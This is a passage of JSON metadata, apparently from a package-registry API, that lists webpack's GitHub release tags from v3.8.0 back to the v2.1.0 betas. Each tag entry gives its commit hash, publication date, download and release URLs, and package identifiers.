purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.